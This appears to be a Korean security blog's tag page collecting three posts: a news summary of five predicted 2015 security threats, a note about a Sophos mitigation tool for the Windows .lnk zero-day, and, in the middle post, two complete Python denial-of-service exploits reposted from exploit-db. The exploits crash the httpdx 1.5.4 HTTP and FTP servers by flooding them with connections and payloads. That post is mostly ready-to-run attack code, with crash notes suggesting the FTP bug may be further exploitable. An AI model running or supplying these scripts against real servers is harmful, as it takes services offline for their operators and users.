'Zero-Day'에 해당되는 글 4건

  1. 2015.01.07 2015년 가장 주목해야 할 보안위협 5가지
  2. 2010.08.19 Multiple Denial of Service Vulnerabilities
  3. 2010.07.27 MS 취약점 Lnk 바로가기 파일 차단도구
2015.01.07 20:04

2015년 가장 주목해야 할 보안위협 5가지

악성코드·랜섬웨어·APT·취약점·금융보안·IoT 보안위협 등

더욱 정교화된 보안위협으로 발전·확산 예상

http://www.boannews.com/media/view.asp?idx=44994


▲ 지난해 기승을 부렸던 보안위협들은 2015년 더욱 지능화되고 정교화된 보안위협으로

   발전·확산될 것으로 예상된다.


보안위협 하나. 악성코드·랜섬웨어의 고도화 및 피해 확산

안랩은 올해 악성코드는 공격 대상별 타깃형·맞춤형 유포와 함께 동작방식이 점차 진화될 것으로 전망했다. 예를 들어 스피어피싱(Spear Phishing) 이메일을 연말에는 송년회 모임 안내로, 연초에는 새해인사로, 해당 시기에 맞춰 발송하거나 첨부파일명과 내용도 실제 모임을 안내하는 문서로 만들어 악성코드를 유포시키는 방식이다.


보안위협 둘. IoT의 발전에 따른 보안위협과 사회적 관심 증가

2019년까지 500억개 이상 IoT 단말기 및 연결 개체수의 증가가 예상되는 가운데 맥아피는 IP카메라, Smart Meter, 헬스케어 및 SCADA 디바이스에 대한 공격, IoT 디바이스 내이 데이터 가치로 인한 공격빈도가 가파르게 증가할 것으로 예상했다.


보안위협 셋. 모바일·PC·POS 등 강력한 금융보안 위협 확대

올해에는 핀테크(FinTech) 개념의 여러 가지 모바일 금융결제 서비스가 본격 도입될 것으로 예상된다. 이에 대해 이스트소프트는 핀테크가 확대되면 금융거래 및 결제프로세스가 간소화되면서 사용자들에게는 편의성이 향상되는 반면, 새로운 모바일 금융결제 서비스 이용자들을 노린 공격도 발생할 가능성이 높다고 전망했다.


보안위협 넷. 오픈소스 취약점 및 정보유출

지난 2014년에는 ‘하트블리드(Heartbleed)’나 ‘쉘쇼크(ShellShock)’와 같은 오픈소스 취약점이 연이어 공개됐다. 이 취약점들은 새로운 것이라기 보다는 오랜 기간 잠재된 문제점이 구체적으로 악용되기 시작한 사례라 볼 수 있다.


보안위협 다섯. 더 정교해진 APT 공격

카스퍼스키랩은 2014년에 발생했던 APT공격들이 ‘정교’했다면 2015년에는 ‘교묘’해질 것으로 예상했다. APT 공격 집단들은 공격을 숨기기 위해 앞으로 더욱 은밀하고 교활해질 것이라는 것. 지난해 카스퍼스키랩은 제로 데이(Zero-day)를 사용한 APT 공격을 발견했고, 새롭고 은밀한 수법들을 분석했다.




출처 : 보안뉴스


Trackback 0 Comment 0
2010.08.19 10:53

Multiple Denial of Service Vulnerabilities

#!/usr/bin/env python
  
###########################################################################
#
# Title:    httpdx v1.5.4 Remote HTTP Server DoS (0day)
# By:       Dr_IDE
# Tested:   XPSP3
# Download: http://httpdx.sourceforge.net
# Note:     Server will totally crash if only running the EXE
# Note:     Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may not be exploitable as it dumps on a read operation. 
# Upon crash throws: Access violation when reading [00001238]
#
############################################################################
  
import socket, sys
  
payload = ("GET / HTTP/1.1\r\n\r\n");
x=1;
  
try:
    while (x < 2048):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print ("[*] Connecting to httpdx server.");
        s.connect((sys.argv[1], 80));
        print ("\n[*] Sending command.\n");
        s.send(payload);
        s.close();
        x = x+1;
  
except:
    print ("[*] Success! We crashed the server in %d attempts." % x);
    print ("[i] [pocoftheday.blogspot.com]");
  
  
=====================================================================================
  
#!/usr/bin/env python
  
###########################################################################
#
# Title:    httpdx v1.5.4 Remote FTP Server DoS (0day)
# By:       Dr_IDE
# Tested:   XPSP3
# Download: http://httpdx.sourceforge.net
# Note:     Server will totally crash if only running the EXE
# Note:     Get a "ffs what happened?" message if running via BAT
#
############################################################################
#
# Debugging Notes: This may be exploitable as it dumps on a write operation. 
# Upon crash throws: Access violation when writing to [00230000]
#
############################################################################
  
import socket, sys
  
payload = ("USER anonymous\r\n\r\n");
x=1;
  
try:
    while (x < 2048):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print ("[*] Connecting to httpdx server.");
        s.connect((sys.argv[1], 21));
        print ("\n[*] Sending command.\n");
        s.send(payload);
        s.close();
        x = x+1;
  
except:
    print ("[*] Success! We crashed the server in %d attempts." % x);
    print ("[i] [pocoftheday.blogspot.com]"); 


출처 : exploit-db.com

Trackback 0 Comment 0
2010.07.27 16:34

MS 취약점 Lnk 바로가기 파일 차단도구

마이크로소프트사의 Lnk(바로가기, Shortcut) Zero-Day 취약점(패치 미발표)을 이용한 악성코드 주의

지난 MS 윈도우 쉘 바로기가 .lnk 관련 취약점에 대해서 익스플로잇을 보호하기 위한 툴입니다.

패치가 나오기 전에 임시방편으로 사용하면 좋을듯 합니다.

# 익스폴로잇 보호 동영상
 

출처 : http://www.sophos.com/

Trackback 0 Comment 0